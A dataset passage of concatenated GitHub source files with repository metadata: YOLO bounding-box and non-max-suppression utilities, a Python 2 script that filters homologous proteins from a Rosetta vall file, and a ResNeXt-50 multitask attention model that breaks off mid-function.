for client_thread in client_threads:
client_thread.stop()
client_thread.join()
except:
pass
if __name__ == "__main__":
main()
| [
"jashannon10@gmail.com"
] | jashannon10@gmail.com |
043b864e84413e434016dad4ed24a7fbdfdc04b6 | fbada2dbf3d8963b9bf31accd1ec4a5f7e8f40c1 | /detection/models/detection/yolo/utils.py | db71c12addb9a78b7cb0b03d2dc1424377b12cc7 | [
"MIT"
] | permissive | stanford-policylab/surveilling-surveillance | fd7cabe2b526f5019e163961e0eef35c0ad29e45 | bbb9a147927a6342eecfe07ffa756b3acdb63f35 | refs/heads/master | 2023-06-17T14:32:22.923890 | 2021-07-15T16:10:41 | 2021-07-15T16:10:41 | 368,739,706 | 12 | 1 | null | null | null | null | UTF-8 | Python | false | false | 10,186 | py | """Define Logger class for logging information to stdout and disk."""
import collections
import os
import json
import torch
import numpy as np
import time
import torchvision
from os.path import join
def xywh2xyxy(x):
    """Convert boxes from (cx, cy, w, h) to corner form (x1, y1, x2, y2).

    Operates on the last dimension; returns a new tensor, `x` is untouched.
    """
    converted = x.clone()
    half_w = x[..., 2] / 2
    half_h = x[..., 3] / 2
    converted[..., 0] = x[..., 0] - half_w
    converted[..., 1] = x[..., 1] - half_h
    converted[..., 2] = x[..., 0] + half_w
    converted[..., 3] = x[..., 1] + half_h
    return converted
def bbox_iou(box1, box2, x1y1x2y2=True):
    """Return the IoU of two (N, 4) batches of bounding boxes, pairwise by row.

    box1, box2 -- tensors of boxes; corner format (x1, y1, x2, y2) when
                  x1y1x2y2 is True, else center format (cx, cy, w, h).
    Uses the inclusive-pixel convention (widths/heights computed with +1).
    """
    if not x1y1x2y2:
        # Transform from center and width to exact coordinates
        b1_x1, b1_x2 = box1[:, 0] - box1[:, 2] / 2, box1[:, 0] + box1[:, 2] / 2
        b1_y1, b1_y2 = box1[:, 1] - box1[:, 3] / 2, box1[:, 1] + box1[:, 3] / 2
        b2_x1, b2_x2 = box2[:, 0] - box2[:, 2] / 2, box2[:, 0] + box2[:, 2] / 2
        b2_y1, b2_y2 = box2[:, 1] - box2[:, 3] / 2, box2[:, 1] + box2[:, 3] / 2
    else:
        # Get the coordinates of bounding boxes
        b1_x1, b1_y1, b1_x2, b1_y2 = (box1[:, 0], box1[:, 1],
                                      box1[:, 2], box1[:, 3])
        b2_x1, b2_y1, b2_x2, b2_y2 = (box2[:, 0], box2[:, 1],
                                      box2[:, 2], box2[:, 3])
    # get the coordinates of the intersection rectangle
    inter_rect_x1 = torch.max(b1_x1, b2_x1)
    inter_rect_y1 = torch.max(b1_y1, b2_y1)
    inter_rect_x2 = torch.min(b1_x2, b2_x2)
    inter_rect_y2 = torch.min(b1_y2, b2_y2)
    # Intersection area (clamped to 0 when boxes do not overlap)
    inter_area = (torch.clamp(inter_rect_x2 - inter_rect_x1 + 1, min=0) *
                  torch.clamp(inter_rect_y2 - inter_rect_y1 + 1, min=0))
    # Union Area (1e-16 guards against division by zero)
    b1_area = (b1_x2 - b1_x1 + 1) * (b1_y2 - b1_y1 + 1)
    b2_area = (b2_x2 - b2_x1 + 1) * (b2_y2 - b2_y1 + 1)
    iou = inter_area / (b1_area + b2_area - inter_area + 1e-16)
    return iou
def bbox_wh_iou(wh1, wh2):
    """IoU of one (w, h) anchor against N (w, h) box sizes, corner-aligned.

    wh1 -- tensor of shape (2,); wh2 -- tensor of shape (N, 2).
    Returns a tensor of shape (N,).
    """
    anchor_w, anchor_h = wh1[0], wh1[1]
    transposed = wh2.t()
    box_w, box_h = transposed[0], transposed[1]
    overlap = torch.min(anchor_w, box_w) * torch.min(anchor_h, box_h)
    # 1e-16 guards against a zero-area union.
    union = (anchor_w * anchor_h + 1e-16) + box_w * box_h - overlap
    return overlap / union
def build_targets(pred_boxes, target, anchors, ignore_thres):
ByteTensor = torch.cuda.ByteTensor if pred_boxes.is_cuda\
else torch.ByteTensor
FloatTensor = torch.cuda.FloatTensor if pred_boxes.is_cuda\
else torch.FloatTensor
nB = pred_boxes.size(0)
nA = pred_boxes.size(1)
nG = pred_boxes.size(2)
# Output tensors
obj_mask = ByteTensor(nB, nA, nG, nG).fill_(0)
noobj_mask = ByteTensor(nB, nA, nG, nG).fill_(1)
iou_scores = FloatTensor(nB, nA, nG, nG).fill_(0)
tx = FloatTensor(nB, nA, nG, nG).fill_(0)
ty = FloatTensor(nB, nA, nG, nG).fill_(0)
tw = FloatTensor(nB, nA, nG, nG).fill_(0)
th = FloatTensor(nB, nA, nG, nG).fill_(0)
# Convert to position relative to box
target_boxes = target[:, 2:6] * nG
gxy = target_boxes[:, :2]
gwh = target_boxes[:, 2:]
# Get anchors with best iou
ious = torch.stack([bbox_wh_iou(anchor, gwh) for anchor in anchors])
best_ious, best_n = ious.max(0)
# Separate target values
b, target_labels = target[:, :2].long().t()
gx, gy = gxy.t()
gw, gh = gwh.t()
gi, gj = gxy.long().t()
# Set masks
obj_mask[b, best_n, gj, gi] = 1
noobj_mask[b, best_n, gj, gi] = 0
# Set noobj mask to zero where iou exceeds ignore threshold
for i, anchor_ious in enumerate(ious.t()):
noobj_mask[b[i], anchor_ious > ignore_thres, gj[i], gi[i]] = 0
# Coordinates
tx[b, best_n, gj, gi] = gx - gx.floor()
ty[b, best_n, gj, gi] = gy - gy.floor()
# Width and height
tw[b, best_n, gj, gi] = torch.log(gw / anchors[best_n][:, 0] + 1e-16)
th[b, best_n, gj, gi] = torch.log(gh / anchors[best_n][:, 1] + 1e-16)
iou_scores[b, best_n, gj, gi] = bbox_iou(
pred_boxes[b, best_n, gj, gi], target_boxes, x1y1x2y2=False)
tconf = obj_mask.float()
return (iou_scores, obj_mask, noobj_mask,
tx, ty, tw, th, tconf)
def slice_boundary(t, width):
    """Trim `width` pixels off each spatial border of a (B, C, W, H, ...) tensor.

    Returns `t` unchanged when width is 0; raises ValueError on a
    non-integer, negative, or too-large width.
    """
    if not isinstance(width, int):
        raise ValueError(f"ignore_width must be an integer. Got {width}.")
    if width < 0:
        raise ValueError(f"ignore_width must be positive. Got {width}.")
    if width > t.shape[2] // 2:
        raise ValueError("ignore_width * 2 must be less than image dim. " +
                         f"Got {width}.")
    if width == 0:
        return t
    trimmed = t[:, :, width:-width, width:-width]
    return trimmed.contiguous()
def parse_model_config(path, num_classes=80):
    """Parse a yolo-v3 layer configuration file into module definitions.

    Each `[section]` header becomes a dict with a 'type' key plus the
    section's key=value options.  The 'classes' option of every yolo
    layer — and the 'filters' option of the convolutional layer right
    before it — are overwritten to match `num_classes`.
    Returns the list of module-definition dicts.
    """
    # BUGFIX: use a context manager so the file handle is closed
    # (the original opened the file and never closed it).
    with open(path, 'r') as config_file:
        lines = config_file.read().split('\n')
    lines = [x for x in lines if x and not x.startswith('#')]
    lines = [x.rstrip().lstrip()
             for x in lines]  # get rid of fringe whitespaces
    module_defs = []
    for line in lines:
        if line.startswith('['):  # This marks the start of a new block
            module_defs.append({})
            module_defs[-1]['type'] = line[1:-1].rstrip()
            if module_defs[-1]['type'] == 'convolutional':
                module_defs[-1]['batch_normalize'] = 0
        else:
            key, value = line.split("=")
            value = value.strip()
            module_defs[-1][key.rstrip()] = value.strip()
    # Overwrite number of classes
    yolo_layers = []
    for i, module_def in enumerate(module_defs):
        if module_def['type'] == 'yolo':
            yolo_layers.append(i)
            module_defs[i]['classes'] = str(num_classes)
    for i in yolo_layers:
        # Each YOLO head predicts 3 anchors x (num_classes + 5) values.
        module_defs[i - 1]['filters'] = str((num_classes + 5) * 3)
    return module_defs
def parse_data_config(path):
    """Parse a data configuration file into a dict of string options.

    Lines are `key=value`; blank lines and '#' comments are skipped.
    'gpus' and 'num_workers' get defaults the file may override.
    """
    options = dict()
    options['gpus'] = '0,1,2,3'
    options['num_workers'] = '10'
    with open(path, 'r') as fp:
        lines = fp.readlines()
    for line in lines:
        line = line.strip()
        if line == '' or line.startswith('#'):
            continue
        # BUGFIX: split on the first '=' only, so values containing '='
        # survive (the original unbounded split raised ValueError there).
        key, value = line.split('=', 1)
        options[key.strip()] = value.strip()
    return options
def to_cpu(tensor):
    """Return `tensor` detached from the autograd graph and moved to the CPU."""
    detached = tensor.detach()
    return detached.cpu()
def xy_to_cxcy(xy, height, width):
    """Convert a corner box [x1, y1, x2, y2] to normalized [cx, cy, w, h].

    Coordinates are divided by the image `width`/`height` so the result
    lies in [0, 1] for boxes inside the image.
    """
    x1, y1, x2, y2 = xy[0], xy[1], xy[2], xy[3]
    center_x = (x1 + x2) / 2 / width
    center_y = (y1 + y2) / 2 / height
    box_w = (x2 - x1) / width
    box_h = (y2 - y1) / height
    return [center_x, center_y, box_w, box_h]
def non_max_suppression(
prediction,
conf_thres=0.25,
iou_thres=0.45,
classes=None,
agnostic=False,
labels=()):
"""Performs Non-Maximum Suppression (NMS) on inference results
Returns:
detections with shape: nx6 (x1, y1, x2, y2, conf, cls)
"""
nc = prediction.shape[2] - 5 # number of classes
xc = prediction[..., 4] > conf_thres # candidates
# Settings
# (pixels) minimum and maximum box width and height
min_wh, max_wh = 2, 4096
max_det = 300 # maximum number of detections per image
max_nms = 30000 # maximum number of boxes into torchvision.ops.nms()
time_limit = 20.0 # seconds to quit after
redundant = True # require redundant detections
multi_label = nc > 1 # multiple labels per box (adds 0.5ms/img)
merge = False # use merge-NMS
t = time.time()
output = [torch.zeros((0, 6), device=prediction.device)
] * prediction.shape[0]
for xi, x in enumerate(prediction): # image index, image inference
# Apply constraints
# x[((x[..., 2:4] < min_wh) | (x[..., 2:4] > max_wh)).any(1), 4] = 0 #
# width-height
x = x[xc[xi]] # confidence
# Cat apriori labels if autolabelling
if labels and len(labels[xi]):
l = labels[xi]
v = torch.zeros((len(l), nc + 5), device=x.device)
v[:, :4] = l[:, 1:5] # box
v[:, 4] = 1.0 # conf
v[range(len(l)), l[:, 0].long() + 5] = 1.0 # cls
x = torch.cat((x, v), 0)
# If none remain process next image
if not x.shape[0]:
continue
# Compute conf
x[:, 5:] *= x[:, 4:5] # conf = obj_conf * cls_conf
# Box (center x, center y, width, height) to (x1, y1, x2, y2)
box = xywh2xyxy(x[:, :4])
# Detections matrix nx6 (xyxy, conf, cls)
if multi_label:
i, j = (x[:, 5:] > conf_thres).nonzero(as_tuple=False).T
x = torch.cat((box[i], x[i, j + 5, None], j[:, None].float()), 1)
else: # best class only
conf, j = x[:, 5:].max(1, keepdim=True)
x = torch.cat((box, conf, j.float()), 1)[conf.view(-1) > conf_thres]
# Filter by class
if classes is not None:
x = x[(x[:, 5:6] == torch.tensor(classes, device=x.device)).any(1)]
# Apply finite constraint
# if not torch.isfinite(x).all():
# x = x[torch.isfinite(x).all(1)]
# Check shape
n = x.shape[0] # number of boxes
if not n: # no boxes
continue
elif n > max_nms: # excess boxes
# sort by confidence
x = x[x[:, 4].argsort(descending=True)[:max_nms]]
# Batched NMS
c = x[:, 5:6] * (0 if agnostic else max_wh) # classes
boxes, scores = x[:, :4] + c, x[:, 4] # boxes (offset by class), scores
i = torchvision.ops.nms(boxes, scores, iou_thres) # NMS
if i.shape[0] > max_det: # limit detections
i = i[:max_det]
if merge and (
1 < n < 3E3): # Merge NMS (boxes merged using weighted mean)
# update boxes as boxes(i,4) = weights(i,n) * boxes(n,4)
iou = box_iou(boxes[i], boxes) > iou_thres # iou matrix
weights = iou * scores[None] # box weights
x[i, :4] = torch.mm(weights, x[:, :4]).float(
) / weights.sum(1, keepdim=True) # merged boxes
if redundant:
i = i[iou.sum(1) > 1] # require redundancy
output[xi] = x[i]
if (time.time() - t) > time_limit:
print(f'WARNING: NMS time limit {time_limit}s exceeded')
break # time limit exceeded
return output
| [
"me@hsheng.org"
] | me@hsheng.org |
3a6288fd90d84dfdf4c45f2ac3a254ddfdd9051e | 3865d338db6caedff9cce9c0ca2ac4b5929ac2d1 | /rosetta/filter_fragfold.py | 186863f6886335e1ced06a8a1fda526118c532ae | [] | no_license | vam-sin/bioinfo-toolbox | fc90b347da7d733a2e5732b7352f1e8cdbf5b164 | 79f52038b7eb20337508ee49a87d2677a8ffad9c | refs/heads/master | 2022-12-09T18:39:18.743490 | 2020-08-26T14:14:58 | 2020-08-26T14:14:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,458 | py | import sys
import parse_vall
import parse_cath_clf
from time import clock
def filter(cath_dom_list, frag_dict):
    """Drop fragments whose PDB code matches any CATH domain in the list.

    Mutates `frag_dict` in place and returns (frag_dict, removed_count).
    NOTE: the name shadows the builtin `filter`; kept for existing callers.
    """
    removed = 0
    for domain_id in cath_dom_list:
        # The first four characters of a CATH domain id are the PDB code.
        pdb_code = domain_id[:4]
        if pdb_code in frag_dict:
            del frag_dict[pdb_code]
            removed += 1
    return frag_dict, removed
def main(vallfile_name, clf_name, pdb_id):
    """Remove fragments homologous to `pdb_id` from a Rosetta vall file.

    Looks up the superfamilies of `pdb_id` in the CATH classification
    file, gathers every domain in those superfamilies, and filters the
    parsed vall fragment dict against them.
    Returns (vallfile_list, removed_count).
    NOTE(review): Python 2 script (bare `print`); `clock` is
    time.clock, removed in Python 3.8.  The open() handles below are
    never closed — presumably acceptable for a one-shot script.
    """
    pdb_sfam_dict = parse_cath_clf.get_pdb_sfam_dict(open(clf_name, 'r'))
    sfam_dom_dict = parse_cath_clf.get_sfam_dom_dict(open(clf_name, 'r'))
    sfam_list = pdb_sfam_dict[pdb_id]
    # Collect all domains from every superfamily the query belongs to.
    dom_list = []
    for sfam in sfam_list:
        dom_list += sfam_dom_dict[sfam]
    print dom_list
    print 'Parsing started...'
    t0 = clock()
    vallfile_list = parse_vall.read(open(vallfile_name, 'r'))
    t1 = clock()
    print 'Parsing ended in %ds.\n' % (t1 - t0)
    # vallfile_list[2] is the fragment dict keyed by PDB code.
    frag_dict = vallfile_list[2]
    print 'Running filter...'
    t0 = clock()
    new_frag_dict, count = filter(dom_list, frag_dict)
    t1 = clock()
    print 'Filtered in %ds.\n' % (t1 - t0)
    vallfile_list[2] = new_frag_dict
    return vallfile_list, count
if __name__ == '__main__':
new_vallfile_list, count = main(sys.argv[1], sys.argv[2], sys.argv[3])
print 'Removed %d homologous proteins from vall file.' % count
print 'Writing started...'
t0 = clock()
parse_vall.write(new_vallfile_list, open('%s' % sys.argv[1], 'w'))
t1 = clock()
print 'Writing ended in %ds.\n' % (t1 - t0)
| [
"mirco.michel@scilifelab.se"
] | mirco.michel@scilifelab.se |
86157b173385f4d53dbc01fa8e2417b7ee496c95 | f952a4583b0b751a1d5e2c5c453b16b1eb790ce5 | /networks/resnext_50_share_attention.py | db6b84562b8195c8267425a8f726e74a486801de | [] | no_license | dotpyu/Concept-Sharing-Network | 18b636a556cbc2dff887ac3c06110c58064393c8 | 2c85b312ef7d93a79498b5b3a8bc7b4d008e7b94 | refs/heads/master | 2022-04-11T02:07:16.387275 | 2020-03-30T20:44:36 | 2020-03-30T20:44:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,668 | py |
import torch
import torch.nn as nn
from torch.autograd import Variable
from functools import reduce
import pdb
from collections import OrderedDict
import torch.nn.functional as f
class LambdaBase(nn.Sequential):
    """Base for torch7-to-pytorch converted wrappers: stores a python
    function plus optional child modules whose outputs the function
    consumes (see the Lambda/LambdaMap/LambdaReduce subclasses)."""
    def __init__(self, fn, *args):
        super(LambdaBase, self).__init__(*args)
        self.lambda_func = fn
    def forward_prepare(self, input):
        """Run every child module on `input` and return the list of
        results, or `input` itself when there are no children."""
        output = []
        for module in self._modules.values():
            output.append(module(input))
        return output if output else input
class Lambda(LambdaBase):
    def forward(self, input):
        # Apply the stored function to the prepared input (the list of
        # child outputs, or the raw input when there are no children).
        return self.lambda_func(self.forward_prepare(input))
class LambdaMap(LambdaBase):
    def forward(self, input):
        # Map the stored function over each child module's output.
        return list(map(self.lambda_func,self.forward_prepare(input)))
class LambdaReduce(LambdaBase):
    def forward(self, input):
        # Fold the child outputs pairwise, e.g. elementwise add for the
        # converted CAddTable layers used below.
        return reduce(self.lambda_func,self.forward_prepare(input))
resnext_50_32x4d = nn.Sequential( # Sequential,
nn.Conv2d(3,64,(7, 7),(2, 2),(3, 3),1,1,bias=False),
nn.BatchNorm2d(64),
nn.ReLU(),
nn.MaxPool2d((3, 3),(2, 2),(1, 1)),
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(64,128,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(128),
nn.ReLU(),
nn.Conv2d(128,128,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(128),
nn.ReLU(),
),
nn.Conv2d(128,256,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(256),
),
nn.Sequential( # Sequential,
nn.Conv2d(64,256,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(256),
),
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(256,128,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(128),
nn.ReLU(),
nn.Conv2d(128,128,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(128),
nn.ReLU(),
),
nn.Conv2d(128,256,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(256),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(256,128,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(128),
nn.ReLU(),
nn.Conv2d(128,128,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(128),
nn.ReLU(),
),
nn.Conv2d(128,256,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(256),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
),
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(256,256,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(256),
nn.ReLU(),
nn.Conv2d(256,256,(3, 3),(2, 2),(1, 1),1,32,bias=False),
nn.BatchNorm2d(256),
nn.ReLU(),
),
nn.Conv2d(256,512,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
),
nn.Sequential( # Sequential,
nn.Conv2d(256,512,(1, 1),(2, 2),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
),
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(512,256,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(256),
nn.ReLU(),
nn.Conv2d(256,256,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(256),
nn.ReLU(),
),
nn.Conv2d(256,512,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(512,256,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(256),
nn.ReLU(),
nn.Conv2d(256,256,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(256),
nn.ReLU(),
),
nn.Conv2d(256,512,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(512,256,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(256),
nn.ReLU(),
nn.Conv2d(256,256,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(256),
nn.ReLU(),
),
nn.Conv2d(256,512,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
),
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(512,512,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
nn.Conv2d(512,512,(3, 3),(2, 2),(1, 1),1,32,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
),
nn.Conv2d(512,1024,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(1024),
),
nn.Sequential( # Sequential,
nn.Conv2d(512,1024,(1, 1),(2, 2),(0, 0),1,1,bias=False),
nn.BatchNorm2d(1024),
),
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(1024,512,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
nn.Conv2d(512,512,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
),
nn.Conv2d(512,1024,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(1024),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(1024,512,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
nn.Conv2d(512,512,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
),
nn.Conv2d(512,1024,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(1024),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(1024,512,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
nn.Conv2d(512,512,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
),
nn.Conv2d(512,1024,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(1024),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(1024,512,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
nn.Conv2d(512,512,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
),
nn.Conv2d(512,1024,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(1024),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(1024,512,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
nn.Conv2d(512,512,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
),
nn.Conv2d(512,1024,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(1024),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
),
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(1024,1024,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(1024),
nn.ReLU(),
nn.Conv2d(1024,1024,(3, 3),(2, 2),(1, 1),1,32,bias=False),
nn.BatchNorm2d(1024),
nn.ReLU(),
),
nn.Conv2d(1024,2048,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(2048),
),
nn.Sequential( # Sequential,
nn.Conv2d(1024,2048,(1, 1),(2, 2),(0, 0),1,1,bias=False),
nn.BatchNorm2d(2048),
),
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(2048,1024,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(1024),
nn.ReLU(),
nn.Conv2d(1024,1024,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(1024),
nn.ReLU(),
),
nn.Conv2d(1024,2048,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(2048),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(2048,1024,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(1024),
nn.ReLU(),
nn.Conv2d(1024,1024,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(1024),
nn.ReLU(),
),
nn.Conv2d(1024,2048,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(2048),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
),
# nn.AvgPool2d((7, 7),(1, 1)),
# Lambda(lambda x: x.view(x.size(0),-1)), # View,
)
class resnext_car_multitask(nn.Module):
def __init__(self, cropsize=224, resnext_model=None, class_num=1, test=False, fc_num = 8, att_num = 9):
super(resnext_car_multitask, self).__init__()
self.resnext_car_multitask=resnext_50_32x4d
self.classifier = []
self.att = []
self.att_k = []
self.class_num = class_num
self.relu = nn.ReLU()
self.drop = nn.Dropout(p=0.5)
self.upsample = nn.Upsample(scale_factor=2)
self.ave_pool = nn.AvgPool2d((7, 7),(1, 1))
self.ave_pool2 = nn.AvgPool2d((2,2),(1, 1))
self.att_num = att_num
self.fc_num = fc_num
self.max_pool = nn.MaxPool2d((7,7),(1,1))
embed_size = 66
embed_size = 2048
k = 5
self.soft = nn.Softmax(2)
# for params in self.parameters():
# params.requires_grad = False
self.cropsize = cropsize
for params in self.parameters():
if params.ndimension()>1:
torch.nn.init.xavier_uniform(params)
else:
torch.nn.init.normal(params)
for i in range(self.att_num):
self.att.append(nn.Conv2d(1024,1,(3, 3),(2, 2),(1, 1),1, 1,bias=False))
self.att_k.append(nn.Parameter(torch.zeros(1,1,k), requires_grad=True))
self.att[i].weight.data.fill_(0)
for i in range(self.class_num):
self.classifier.append(nn.Linear(embed_size,2))
self.classifier = nn.ModuleList(self.classifier)
self.att_k = nn.ParameterList(self.att_k)
self.att = nn.ModuleList(self.att)
if False:
print('loading model')
params = torch.load(resnext_model)
keys = params.keys()
# pop 1000 fc for loading models
keys1 = list(keys)
pdb.set_trace()
if test:
new_state_dict = OrderedDict()
for k,v in params.items():
word = k.split('.')
l = len(word[0])
name = k[l+1:]
new_state_dict[name] = v
self.resnext_car_multitask.load_state_dict(params)
else:
params.pop(keys1[-1])
params.pop(keys1[-2])
self.resnext_car_multitask.load_state_dict(params)
def forward(self, x,att_index, fc_index):
x = x.view(-1, 3, self.cropsize, self.cropsize)
# x = self.resnext_car_multitask(x)
module1 = nn.Sequential(*list(self.resnext_car_multitask.children())[:-1])
module2 = nn.Sequential(*list(self.resnext_car_multitask.children())[-1])
x1 =module1(x)
x =module2(x1)
x_norm = x1.view(x1.size(0),x1.size(1),-1)
x_norm = f.normalize(x_norm,p=2,dim=2)
x_norm = x_norm.view(x1.size(0),x1.size(1),x1.size(2),x1.size(3))
outputs = []
outputs2 = []
# x = self.upsample(x)
x = x.view(x.size(0), x.size(1), -1)
for i in range(self.class_num):
att0 = self.att[att_index[i]](x_norm)
height = att0.size(2)
att0 = att0.repeat(1,x.size(1),1,1)
att0 = att0.view(x.size(0),x.size(1),-1 )
att0_k = self.att_k[att_index[i]]
att0_k = att0_k.repeat(x.size(0),x.size(1),1)
att0 = torch.cat((att0, att0_k), 2)
att0 = self.soft(att0)
